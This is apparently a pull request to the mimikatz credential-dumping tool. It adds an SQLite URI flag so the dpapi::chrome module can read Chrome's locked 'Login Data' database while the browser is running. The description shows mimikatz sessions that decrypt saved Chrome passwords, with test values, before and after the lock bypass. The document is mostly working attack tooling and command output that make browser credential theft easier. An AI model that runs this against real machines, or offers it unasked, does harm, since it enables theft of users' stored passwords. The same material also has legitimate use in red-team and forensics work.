### PR TITLE
Add SQLITE_OPEN_URI to dpapi_chrome to allow for lockless opening

### DIFF
--- a/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_chrome.c
+++ b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_chrome.c
@@ -24,7 +24,7 @@ NTSTATUS kuhl_m_dpapi_chrome(int argc, wchar_t * argv[])
 			rc = sqlite3_initialize();
 			if(rc == SQLITE_OK)
 			{
-				rc = sqlite3_open_v2(aInfile, &pDb, SQLITE_OPEN_READONLY, NULL);
+				rc = sqlite3_open_v2(aInfile, &pDb, SQLITE_OPEN_READONLY | SQLITE_OPEN_URI, NULL);
 				if(rc == SQLITE_OK)
 				{
 					if(kuhl_m_dpapi_chrome_isTableExist(pDb, "logins"))


### PR DESCRIPTION
Currently, `dpapi::chrome` fails to run when Chrome is open due to sqlite trying to lock the database and failing. This PR enables the `SQLITE_OPEN_URI` flag on `sqlite3_open_v2` which allows for the addition of the `?nolock=1` parameter to the database filename (when formatted as a file: uri), bypassing this restriction.

The below output shows that the old behaviour remains unchanged, but the new URI format is also supported which can bypass the lock.


```

  .#####.   mimikatz 2.2.0 (x64) #17763 Apr  8 2019 16:58:17
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Cam Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # dpapi::chrome /in:"C:\Users\rmcnamara\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

URL     : https://www.facebook.com/ ( https://www.facebook.com/ )
Username: testtest
 * using CryptUnprotectData API
Password: testtest

mimikatz # dpapi::chrome /in:"file:///C:/Users/rmcnamara/AppData/Local/Google/Chrome/User%20Data/Default/Login%20Data?nolock=1" /unprotect

URL     : https://www.facebook.com/ ( https://www.facebook.com/ )
Username: testtest
 * using CryptUnprotectData API
Password: testtest
```
Chrome Opened...
```
mimikatz # dpapi::chrome /in:"C:\Users\rmcnamara\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
ERROR kuhl_m_dpapi_chrome_isTableExist ; sqlite3_prepare_v2: database is locked
ERROR kuhl_m_dpapi_chrome_isTableExist ; sqlite3_prepare_v2: database is locked
ERROR kuhl_m_dpapi_chrome ; Neither the table 'logins' or the table 'cookies' exist!

mimikatz # dpapi::chrome /in:"file:///C:/Users/rmcnamara/AppData/Local/Google/Chrome/User%20Data/Default/Login%20Data?nolock=1" /unprotect

URL     : https://www.facebook.com/ ( https://www.facebook.com/ )
Username: testtest
 * using CryptUnprotectData API
Password: testtest

mimikatz #
```

The more 'correct' method for this is to use the lockless `win32-none` VFS as the fourth parameter to `sqlite3_open_v2`, but the bundled version of sqlite does not have this VFS included (upstream does: sqlite3.c:L46502 from sqlite-autoconf-3270200.tar.gz)